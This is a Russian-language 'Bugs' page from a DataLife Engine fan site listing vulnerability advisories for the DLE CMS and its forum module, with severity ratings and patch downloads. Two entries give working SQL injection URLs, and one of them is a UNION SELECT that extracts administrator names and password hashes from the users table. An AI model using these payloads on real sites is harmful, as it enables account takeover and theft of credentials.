Всё Для DataLife Engine!
 
Теги
Сборки Grabber Release сайте Opera ссылки Адаптация пользователя пользователей Модули для DLE версии Google видео Тестировался Оригинал Онлайн Вебмастеру Шаблон mChat Баги


Все теги
Главное меню
Вход на сайт
Логин:
Пароль:
 
Последнее с Форума
Автор: толстый, в теме: Мне нужен бесплатнный шаблон
Автор: Bumblebee, в теме: Cейчас играет..
Автор: PraS, в теме: Музы4ка
Автор: [ppoe], в теме: Взлом страницы в вк
Автор: Boroda, в теме: DJHITMAN
Автор: rSteLlMi, в теме: Проблема с BB-кодами
Последние коменты
Автор: FeAlSe в новости:
OpenID Mod
Автор: yurantut в новости:
DataLife Engine v.8.5 kRicha's EDITION
Автор: idler в новости:
OpenID Mod
Автор: AMD в новости:
ZeoS Detector
Автор: murderer244 в новости:
uCoz Brute ver. 1.5 by Murderer24

Кнопки

Rambler's Top100 Регистрация доменных имен в 17 зонах по выгодным ценам!

Друзья
  Linux & FreeBSD
  JZweb.ru
  Web-Devil.ru
  Veselyha
  DLE Turkish Support
  DLE georgian Support
  Добавить сайт!Add Site!

Наши адреса
  Dle.Co.Ua
  Dle.In.Ua
  DataLife.In.Ua
Реклама


Главная Dle.In.Ua » Баги


Очередная инъекция в DLE Forum Баги  
Очередная инъекция в DLE Forum
Описание: sql-инъекция
Зависимость: register_globals = on
Файл: engine/forum/sources/showtopic.php
Кусок кода:
if (intval($tid))
$row_topic = $db->super_query("SELECT * FROM " . PREFIX . "_forum_topics WHERE tid = $tid");


Как осуществить: http://site.com/?do=forum&act=topic&tid=1+[SQL]

SQL – инъекция в DLE-Forum 2.4 Баги  
SQL – инъекция в DLE-Forum 2.4
В DLE Forum 2.4 есть уязвимость, которая позволяет выполнять запросы в бд, и узнавать любую инфу, например о логинах и о паролях.
У кого стоит данная версия форума, рекомендуется проверить на уязвимость:
ваш_сайт.ру/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+1-- ,

Баг - получаем список доп. полей Баги  
Баг - получаем список доп. полей
Данный баг позволяет просто скачать список доп. полей новостей и юзеров

DLE уязвимость работает на версиях: ВСЕ DLE

Уровень риска: Низкая

Нашёл очередной баг: Lion__

Баг - прямой вызов файлов и мусор в папках Баги  
Баг - прямой вызов файлов и мусор в папках
Данный баг позволяет производить прямой запуск файлов и мусорить в папках

DLE уязвимость работает на версиях: ВСЕ DLE

Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)

Нашёл очередной баг: Lion__

Недостаточная фильтрация входящих данных Баги  
Недостаточная фильтрация входящих данных
Проблема: Пользователю которому разрешена загрузка файлов на сервер (не картинок), может выйти за пределы разрешенной папки загрузки, а если он имеет администраторский аккаунт на сайте, то и повредить данные скрипта.

Ошибка в версии: Все версии

Степень опасности: Средняя (Высокая при наличии администраторского аккаунта на сайте)

Как исправить в полной новости...

Проведение атаки межсайтового скриптинга (XSS) Баги  
Проведение атаки межсайтового скриптинга (XSS)
Проблема: При определенных условиях на сайт можно провести атаку XSS. Данными условиями является посещение авторизованным администратором, сайта злоумышленника, при этом использование администратором устаревшего браузера, что может привести к перехвату куков браузера.

Ошибка в версии: 7.x - 8.5

Степень опасности: Низкая

Для исправления скачайте и скопируйте на свой сервер патч: dle7_85_path.zip [3.17 Kb] (cкачиваний: 235)

Данный патч применим ко всем версиям: 7.x - 8.5


Обменник, обмен webmoney в Украине
Исправления в DLE Forum 2.5 для корректной работы в DLE 8.5 Баги  
Исправления в DLE Forum 2.5 для корректной работы в DLE 8.5
Исправления в DLE Forum 2.5 для корректной работы в DLE 8.5


Исправления в DLE Forum 2.5 для корректной работы в DLE 8.5 (полная инструкция)

Запускаем DLE Forum 2.5 на DataLife Engine 8.5 Баги  
Запускаем DLE Forum 2.5 на DataLife Engine 8.5
Запускаем DLE Forum 2.5 на DataLife Engine 8.5

При установке форума на DataLife Engine 8.5 перестаёт работать быстрый ответ и ещё некоторые AJAX-элементы. Это вызвано серьёзными изменениями в DataLife Engine и переносом AJAX-файлов в другую папку.

Ввиду этого, нам необходимо самим подправить AJAX-файлы DLE Forum'а, чтобы он работал корректно.

Мы предоставляем Вам 2 инструкции: как для установки в папку /forum, так и для поддомена.

фильтруем уязвимость в dle 8.2 и в раних версиях Баги  
фильтруем уязвимость в dle 8.2 и в раних версиях
фильтруем уязвимость в dle 8.2 и в раних версиях

Прочитал на ачате уязвимость с названием "раскрытие путей", долго искал в поисках ответа,что за зверь раскрытие путей
Степень опастности: средняя

DLE Forum - Недостаточная фильтрация входящих данных #2 Баги  
DLE Forum - Недостаточная фильтрация входящих данных #2
Проблема: Отсутствие проверки доступа при редактирование сообщений.
Ошибка в версии: 2.3 - 2.4
Степень опасности: Высокая

Инструкция внутри.


Недостаточная фильтрация входящих данных Баги  
Недостаточная фильтрация входящих данных
Проблема: Недостаточная фильтрация входящих данных в модуле восстановления пароля.

Ошибка в версии: только 8.2, версии ниже 8.2, а также актуальная версия 8.3 данной уязвимости не подвержены

Степень опасности: Очень высокая

Для исправления скачайте и скопируйте на свой сервер патч: dle82_path.zip [2.35 Kb] (cкачиваний: 1071)

Ошибка парсинга заголовков новостей Баги  
Ошибка парсинга заголовков новостей
Проблема: Ошибка парсинга заголовков новостей

Ошибка в версии: 7.3 и ниже

Степень опасности: Низкая


Copyright © 2008. Dle.In.Ua
При копировании информации с сайта ссылка на Dle.In.Ua желательна!!!!!